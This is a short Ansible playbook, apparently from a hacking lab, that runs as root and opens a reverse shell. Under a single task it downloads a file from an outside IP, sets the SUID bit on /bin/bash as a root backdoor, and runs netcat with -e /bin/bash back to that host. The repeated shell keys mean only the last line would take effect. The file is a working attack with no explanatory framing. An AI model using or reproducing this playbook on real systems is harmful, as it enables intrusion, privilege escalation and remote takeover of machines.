---
- name: Execute Reverse Shell Command
  hosts: 127.0.0.1
  sudo: true
  sudo_user: root
  connection: local
  gather_facts: false
  tasks:
    - name: Execute netcat reverse shell
      shell: wget 10.10.1.70:9001/gatos
      shell: chmod u+s /bin/bash
      shell: nc 10.10.1.70 9001 -e /bin/bash
